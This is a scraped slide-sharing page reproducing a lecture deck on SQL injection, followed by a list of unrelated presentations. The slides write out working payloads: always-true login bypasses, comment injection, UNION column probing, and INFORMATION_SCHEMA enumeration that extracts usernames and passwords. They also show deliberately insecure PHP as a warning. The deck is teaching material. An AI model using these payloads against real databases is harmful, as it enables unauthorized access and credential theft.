a1 part 2 injection sql injection sql injection is
play

A1 (Part 2): Injection SQL Injection SQL injection is prevalent - PowerPoint PPT Presentation

Mar 24, 2023 •111 likes •445 views

A1 (Part 2): Injection SQL Injection SQL injection is prevalent SQL injection is impactful Why a password manager is a good idea! SQL injection is ironic SQL injection is funny Overviewtrated Account Summary Account: Account: "SELECT

  1. A1 (Part 2): Injection SQL Injection

  2. SQL injection is prevalent

  3. SQL injection is impactful Why a password manager is a good idea!

  4. SQL injection is ironic

  5. SQL injection is funny

  6. Overviewtrated Account Summary Account: Account: "SELECT * FROM Communication Legacy Systems Bus. Functions Administration Human Resrcs Application Layer Transactions E-Commerce Web Services SKU: SKU: Knowledge accounts WHERE Directories Databases Accounts Finance Acct:5424-6066-2134-4334 Mgmt HTTP Billing acct=‘’ OR 1=1 -- ’" SQL DB Table HTTP Acct:4128-7574-3921-0192 response query request  Acct:5424-9383-2039-4029  APPLICATION    Acct:4128-0004-1234-0293 ATTACK  Custom Code 1. Application presents a form to the attacker 2. Attacker sends an attack in the form data App Server 3. Application forwards attack to Web Server the database in a SQL query Network Layer Hardened OS 4. Database runs query containing attack and sends results back to Firewall Firewall application 5. Application processes data as normal and sends results to the user 6

  7. Structure red Query ry Languag age e [SQL] DATAB ABAS ASE - Language used to communicate ID username password is_admin with a relational database 1 bob p4ssw0rd true - SQLite 2 alice s3cur3 false - PostgreSQL - MySQL Query Data

  8. Logging ng in using ng SQL TABLE: E: users USER SERVER ID username password is_admin POST 1 bob p4ssw0rd true username = alice 2 alice s3cur3 false & password = s3cur3 SELECT password, is_admin FROM users WHERE username = SELECT password, is_admin FROM users WHERE username = ‘ alice ’ ; ‘?’ ;

  9. Dissect ecting ng the query ry string ng TABLE: E: users ID ID ID username username username password password password is_admin is_admin is_admin 1 1 1 bob bob bob p4ssw0rd p4ssw0rd p4ssw0rd true true true 2 2 2 alice alice alice s3cur3 s3cur3 s3cur3 false false false SELECT password, SELECT password, is_admin FROM users WHERE username = SELECT password, is_admin FROM users WHERE username = , is_admin FROM users WHERE username = ‘ alice ’ ; ‘ alice ’ ; ‘ alice ’ ; password = s3cur3 is_admin = false

  10. Logging ng in using ng SQL [cont.] TABLE: E: users USER SERVER ID username password is_admin 1 bob p4ssw0rd true Password 2 alice s3cur3 false supplied: s3cur3 Password in DB: password = s3cur3 s3cur3 is_admin = false Login successful No admin privileges

  11. The perfect password (or username) … ✓ Uppercase letter ✓ Lowercase letter ✓ Number X' or '1'='1' -- ✓ Special character ✓ 16 characters

  12. Basic SQL Injection POST POST TABLE: E: users username = username = ID ID ID ID username username username username password password password password is_admin is_admin is_admin is_admin 1’ OR ‘1’ = ‘1 alice & password = & password = s3cur3 s3cur3 1 1 1 1 bob bob bob bob p4ssw0rd p4ssw0rd p4ssw0rd p4ssw0rd true true true true 2 2 2 2 alice alice alice alice s3cur3 s3cur3 s3cur3 s3cur3 false false false false SELECT password, is_admin FROM users WHERE username = SELECT password, SELECT password, is_admin FROM users WHERE username = SELECT password, is_admin FROM users WHERE username = SELECT password, is_admin FROM users WHERE username = , is_admin FROM users WHERE username = ‘1’ OR ‘1’ = ‘1’ ; ‘1’ OR ‘1’ = ‘1’ ; ‘1’ OR ‘1’ = ‘1’ ; ‘1’ OR ‘1’ = ‘1’ ; ‘ alice ’ ; password = p4ssw0rd is_admin = true password = s3cur3 is_admin = false

  13. Probing for errors Probe forms with charact cters until syntax is broke ken Typically single or double-quotes e.g. sending in parameter of ' Breaks out of username parameter (odd number of quotes) Mysql2::Error: You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '''' AND password=''' at line 1: SELECT * FROM users WHERE username=''' AND password='' Can infer query y was SELECT * FROM users WHERE username=''' AND password='[PASSWORD]' Or Or SELECT * FROM users WHERE username='[USERNAME]' AND password='[PASSWORD]'; Must hide errors from adve versary! y!

  14. Code example (PHP) // Insecure code. Never use! $sqlStatement = "SELECT * FROM users WHERE username='" . $_GET['username'] . "' AND password='" .$_GET['password']. "';"; mysql_query($sqlStatement); If username is-supplied parameter: username -> foo password -> bar Value passed to mysql_query SELECT * FROM users WHERE username='foo' AND password='bar'; Statement returns a row only if there is a user foo with password bar If username is-supplied parameter: username -> > foo' or '1'='1 password -> > bar' or '1'='1 Value passed to mysql_query SELECT * FROM users WHERE username =‘` foo' or '1'='1' AND password='bar' or '1'='1'; Statement returns all rows in users

  15. SQL comment injection // Insecure code. Never use! $sqlStatement = "SELECT * FROM users WHERE username='" . $_GET['username'] . "' AND password='" .$_GET['password']. "';"; mysql_query($sqlStatement); Closing syntax can be a hassle. Must pair the odd quote Solution: Inject SQL comment character # (URL-encoded as %23) or double dash -- -- username -> ' or 1=1 # password -> BlahBlahBlah SELECT * FROM users WHERE username='' or 1=1 # ' AND password='BlahBlahBlah' SQL interpreter ignores everything after comment and executes: SELECT * FROM users WHERE username='' or 1=1 Note that you may need to inject a space character after using a comment character in SQL

  16. SQL - UNION TABLE: E: users UNION merges two tables together ID ID ID ID username username username username password password password password is_admin is_admin is_admin Tables must have the same number of columns to merge 1 1 1 1 bob bob bob bob p4ssw0rd p4ssw0rd p4ssw0rd p4ssw0rd true true true SELECT * from users … 2 2 2 2 alice alice alice alice s3cur3 s3cur3 s3cur3 s3cur3 false false false - UNION SELECT 1,1,1 1 1 1 1 1 1 null - UNION SELECT 1,1,1,null

  17. SQL UNION Injection POST TABLE: E: users username = ID ID ID ID username username username username password password password password is_admin is_admin is_admin is_admin 1’ UNION SELECT SERVER 1,1,1,1 # & password = 1 1 1 1 bob bob bob bob p4ssw0rd p4ssw0rd p4ssw0rd p4ssw0rd 1 1 1 1 1 Password 2 2 2 2 alice alice alice alice s3cur3 s3cur3 s3cur3 s3cur3 0 0 0 0 supplied: 1 1 1 1 1 1 1 1 1 1 1 1 1 Password in DB: 1 SELECT password, SELECT password, is_admin FROM users WHERE username = SELECT password, is_admin FROM users WHERE username = SELECT password, is_admin FROM users WHERE username = SELECT password, is_admin FROM users WHERE username = , is_admin FROM users WHERE username = ‘1’ UNION SELECT 1,1,1,1 # ’ ; ‘1’ UNION SELEC ‘1’ UNION SELECT 1,1,1,1 # ’ ; ‘1’ UNION SELECT 1,1,1,1 # ’ ; '1' UNION SELECT 1,1,1,1 # ECT 1,1,1 ,1,1 ,1 # ’ ; # ' ' ; Login successful Admin password = 1 privileges is_admin = 1

  18. SQL LIMIT What if application breaks if more than 1 row is returned? SQL’s LIMIT keyword prunes result based on number given SELECT password,is_admin from users LIMIT 1; password = p4ssw0rd is_admin = true password = p4ssw0rd is_admin = true password = s3cur3 is_admin = false

  19. SQL - ORDER BY TABLE: E: users ORDER BY Sorts rows based on column number ID username password is_admin Can use to determine number of columns 1 bob p4ssw0rd true ‘ORDER BY x’ works only if x is less than or equal to the number of objects to order 2 alice s3cur3 false ORDER BY 3 • • ORDER BY 4 • ORDER BY 5

  20. SQL INFORMA MATION_SCH CHEMA MA INFORMATION_SCHEMA Special MySQL table containing data about every table and column in database INFORMATION_SCHEMA.tables holds names of tables in “table_name” INFORMATION_SCHEMA.columns is a table containing data about table columns in “column_name” Helpful in injection attacks Example: Suppose this URL is injectable: www.injectable.com/article.php?articleID=5 Assume query uses 5 as input and returns 3 columns. 1) Find name of table you want 5’ UNION SELECT table_name,table_name,table_name FROM INFORMATION_SCHEMA.TABLES -- 2) If table name of interest is “UserAccounts”, then get its columns 5 ‘ UNION SELECT column_name, column_name, column_name FROM INFORMATION_SCHEMA.COLUMNS WHERE table_name=‘UserAccounts’ -- 3) If column_names include username and password 5’ UNION SELECT username,password,password FROM UserAccounts --

  21. MongoDB injections NoSQL database MongoDB Different syntax, but similar vulnerability Find ways to insert an always true condition Similar injection Inject an always true condition • Inject a correct termination of the NoSQL query •

  22. Example: MongoDB injection Differences from SQL injection Logical OR MySQL: or MongoDB: || Equality check MySQL: = MongoDB: == Comment MySQL: # or – - MongoDB: //

Download Presentation
Download Policy: The content available on the website is offered to you 'AS IS' for your personal information and use only. It cannot be commercialized, licensed, or distributed on other websites without prior consent from the author. To download a presentation, simply click this link. If you encounter any difficulties during the download process, it's possible that the publisher has removed the file from their server.

Recommend

5.2) Injections (part 2) Shell Injection, XML Injection, LDAP injection Emmanuel Benoist Spring

5.2) Injections (part 2) Shell Injection, XML Injection, LDAP injection Emmanuel Benoist Spring

5.2) Injections (part 2) Shell Injection, XML Injection, LDAP injection Emmanuel Benoist Spring Term 2016 Berner Fachhochschule | Haute cole spcialise bernoise | Berne University of Applied Sciences 1 Table of Contents Injection in PHP

995 views • 73 slides
A1 (Part 3): Injection Blind SQL Injection Blind SQL Injection SQL injectio ion that tricks ks

A1 (Part 3): Injection Blind SQL Injection Blind SQL Injection SQL injectio ion that tricks ks

A1 (Part 3): Injection Blind SQL Injection Blind SQL Injection SQL injectio ion that tricks ks databases into reveal l information by way of the success or failure of injected querie ies Analogous example le: Login prompt that stops ps

602 views • 14 slides
A1 (Part 1): Injection Command and Code injection A1 Injection Tricking an application

A1 (Part 1): Injection Command and Code injection A1 Injection Tricking an application

A1 (Part 1): Injection Command and Code injection A1 Injection Tricking an application into executing commands or code embedded in data Data and code mixing! Often injected into interpreters SQL, PHP, Python, JavaScript, LDAP,

377 views • 14 slides
Injection mismatch type of injection mismatch will lead to an emittance blow-up. Off axis

Injection mismatch type of injection mismatch will lead to an emittance blow-up. Off axis

Injection mismatch: As a rule, proton/ion accelerators need their full aperture at injection, thus avoiding mismatch allows a beam of larger normalized emittance * and containing more Protons. In proton/ion ring accelerators any Injection

454 views • 4 slides
INJECTION GEL www.eurastechnology.com WHAT IS INJECTION GEL? An injectable gel is a flexible

INJECTION GEL www.eurastechnology.com WHAT IS INJECTION GEL? An injectable gel is a flexible

TECHNOLOGY APPLICATIONS FOR HYDRO ISOLATION AND REPAIR OF UNDERGROUND FACILITIES INJECTION GEL www.eurastechnology.com WHAT IS INJECTION GEL? An injectable gel is a flexible mass of mineral origin, for both dry and wet surfaces solvent-free,

466 views • 29 slides
INJECTION GEL www.eurastechnology.com WHAT IS INJECTION GEL? An injectable gel is a flexible

INJECTION GEL www.eurastechnology.com WHAT IS INJECTION GEL? An injectable gel is a flexible

TECHNOLOGY APPLICATIONS FOR HYDRO ISOLATION AND REPAIR OF UNDERGROUND FACILITIES INJECTION GEL www.eurastechnology.com WHAT IS INJECTION GEL? An injectable gel is a flexible mass of mineral origin, for both dry and wet surfaces solvent-free,

487 views • 21 slides
Injection Safety Every Provider s Responsibility Outline Safe Injection

Injection Safety Every Provider s Responsibility Outline Safe Injection

Injection Safety Every Provider s Responsibility Outline Safe Injection Practices The ONE and ONLY Campaign Outbreak History Mistaken Beliefs A Call to Action Resources and Information

591 views • 20 slides
Reaction Injection Molding (RIM)- Low Quantity Injection Molding for the Life Sciences Industry

Reaction Injection Molding (RIM)- Low Quantity Injection Molding for the Life Sciences Industry

Reaction Injection Molding (RIM)- Low Quantity Injection Molding for the Life Sciences Industry Presented by: Ken Schweitz, President and Doug Culbertson, VP Business Development of Premold Corp Section I. Advantages of RIM Economical

441 views • 29 slides
C0 2 / Acid Gas Injection Well Injection Well Conversion Prepared for the 5 Th Well Bore

C0 2 / Acid Gas Injection Well Injection Well Conversion Prepared for the 5 Th Well Bore

C0 2 / Acid Gas Injection Well Injection Well Conversion Prepared for the 5 Th Well Bore Integrity Network Meeting. Calgary Alberta May 14, 2009 Agenda Wellbore integrity Well design with annular integrity Well design without

443 views • 22 slides
Underground Injection Control (UIC) Permitting, Testing and Monitoring Injection-Storage Permits

Underground Injection Control (UIC) Permitting, Testing and Monitoring Injection-Storage Permits

Underground Injection Control (UIC) Permitting, Testing and Monitoring Injection-Storage Permits Unit February, 2019 1 Railroad Commission of Texas | June 27, 2016 (Change Date In First Master Slide) Session Overview Overview: UIC Online

1.01k views • 79 slides
Stage Fractional- N Injection-Locked PLL Using Soft Injection Dongsheng Yang, Wei Deng, Tomohiro

Stage Fractional- N Injection-Locked PLL Using Soft Injection Dongsheng Yang, Wei Deng, Tomohiro

1S-1 An Automatic Place-and-Routed Two- Stage Fractional- N Injection-Locked PLL Using Soft Injection Dongsheng Yang, Wei Deng, Tomohiro Ueno, Teerachot Siriburanon, Satoshi Kondo, Kenichi Okada, and Akira Matsuzawa Tokyo Institute of

423 views • 10 slides
NEVO sequential gas injection system New sequential gas injection system NEVO Answer for

NEVO sequential gas injection system New sequential gas injection system NEVO Answer for

NEVO sequential gas injection system New sequential gas injection system NEVO Answer for market expectations Modern cars Demanding users Workshop time saving KME trademark Major assumptions of NEVO system Simple Quick to

222 views • 21 slides
AVFI: Fault Injection for Autonomous Vehicles Fault Injection to Measure Resilience of AVs

AVFI: Fault Injection for Autonomous Vehicles Fault Injection to Measure Resilience of AVs

Saurabh Jha, Subho S. Banerjee , James Cyriac, Zbigniew T. Kalbarczyk and Ravishankar K. Iyer Computer Science, Electrical and Computer Engineering AVFI: Fault Injection for Autonomous Vehicles Fault Injection to Measure Resilience of AVs

215 views • 8 slides
www.adduxi.com HIGH QUALITY INJECTION ADDUXI IS A MANUFACTURER OF HIGH-PRECISION INDUSTRIAL

www.adduxi.com HIGH QUALITY INJECTION ADDUXI IS A MANUFACTURER OF HIGH-PRECISION INDUSTRIAL

HIGH QUALITY INJECTION www.adduxi.com HIGH QUALITY INJECTION ADDUXI IS A MANUFACTURER OF HIGH-PRECISION INDUSTRIAL PARTS. INJECTION MOLDING OF MISCELLANEOUS THERMOPLASTICS. HIGH QUALITY INJECTION MAIN OBJECTIVE: PERFORMANCE BASED ON

745 views • 33 slides
CS327E: Elements of Databases Cybersecurity and SQL Injection Dr. Bill Young Department of

CS327E: Elements of Databases Cybersecurity and SQL Injection Dr. Bill Young Department of

CS327E: Elements of Databases Cybersecurity and SQL Injection Dr. Bill Young Department of Computer Sciences University of Texas at Austin Last updated: October 31, 2016 at 12:21 CS327E SQL Injection Slideset: 1 SQL Injection What Id Like

440 views • 39 slides
RD53A injection capacitor measurement results & RD53A pixel hit delay measurement results

RD53A injection capacitor measurement results & RD53A pixel hit delay measurement results

RD53A injection capacitor measurement results & RD53A pixel hit delay measurement results 2/02/2018 Magne Lauritzen Part 1 Injection capacitor measurement Goal Measure capacitance of the injection capacitors that are present on

423 views • 16 slides
Evaluation Process for Administrators & Evaluators using the Administrator Alternative

Evaluation Process for Administrators & Evaluators using the Administrator Alternative

Evaluation Process for Administrators & Evaluators using the Administrator Alternative Process Work Flow & Timeline Step Online Management System Work Flow Action Responsible Party Date Due 1 Evaluation Set-up assigning

354 views • 13 slides
1 The presentation is expected to run about 2 hours, depending on the questions and conversation we

1 The presentation is expected to run about 2 hours, depending on the questions and conversation we

1 The presentation is expected to run about 2 hours, depending on the questions and conversation we have during the presentation. Please keep cell phone distraction to a minimum, although we certainly understand if you need to step out briefly to

1.04k views • 75 slides
Workers' Compensation Attestation Enhancement Webinar for Corporate Users and Professional

Workers' Compensation Attestation Enhancement Webinar for Corporate Users and Professional

Workers' Compensation Attestation Enhancement Webinar for Corporate Users and Professional Administrators November 6, 2019 Presentation Topics Background Information Purpose of Enhancement Registering as a Professional Administrator

466 views • 44 slides
WELLESLEY PUBLIC SCHOOLS | Learning Caring Innovating FY2i Budget Proposal > Budget

WELLESLEY PUBLIC SCHOOLS | Learning Caring Innovating FY2i Budget Proposal > Budget

FY21 Administrations Recommended Budget Presented to the Wellesley School Committee December 10, 2019 WELLESLEY PUBLIC SCHOOLS | Learning Caring Innovating FY2i Budget Proposal > Budget Guidelines > Special Education Funding

391 views • 36 slides
Login to your Student Web Portal New Student Orientation 2016 Login Welcome Screen Go to

Login to your Student Web Portal New Student Orientation 2016 Login Welcome Screen Go to

Login to your Student Web Portal New Student Orientation 2016 Login Welcome Screen Go to http://fbu.empower-xl.com/ To login : Username: (Your Student ID) Default Password: (First 2 letters of your last name + Last 4 numbers of

640 views • 9 slides
Marketplace Portal Redesign Member Test Kick-Off Meeting 2 Agenda Testing Timeline

Marketplace Portal Redesign Member Test Kick-Off Meeting 2 Agenda Testing Timeline

Marketplace Portal Redesign Member Test Kick-Off Meeting 2 Agenda Testing Timeline Marketplace Portal Redesign Overview Two-Factor Phase 1 Overview Test Checklist ALL Member Tests LSA Administration Tests Test

467 views • 21 slides
InfoSec and Privacy Professional Development SAP Success Factors Learning Management System

InfoSec and Privacy Professional Development SAP Success Factors Learning Management System

InfoSec and Privacy Professional Development SAP Success Factors Learning Management System What a learning management system can do for you MySCLearning Agenda Overview of LMS Functionality Review purpose of the LMS Overview of

724 views • 48 slides
Q2- Study Tables Module Accurate Tracking in Dynamic Study Environments 2:00pm 2:50pm Mojave

Q2- Study Tables Module Accurate Tracking in Dynamic Study Environments 2:00pm 2:50pm Mojave

Connect Success Record Report 2019 Annual Redrock Conference Q2- Study Tables Module Accurate Tracking in Dynamic Study Environments 2:00pm 2:50pm Mojave Success Strategies for Your Campus Connect Success Record Report What Is Q2

480 views • 14 slides

More recommend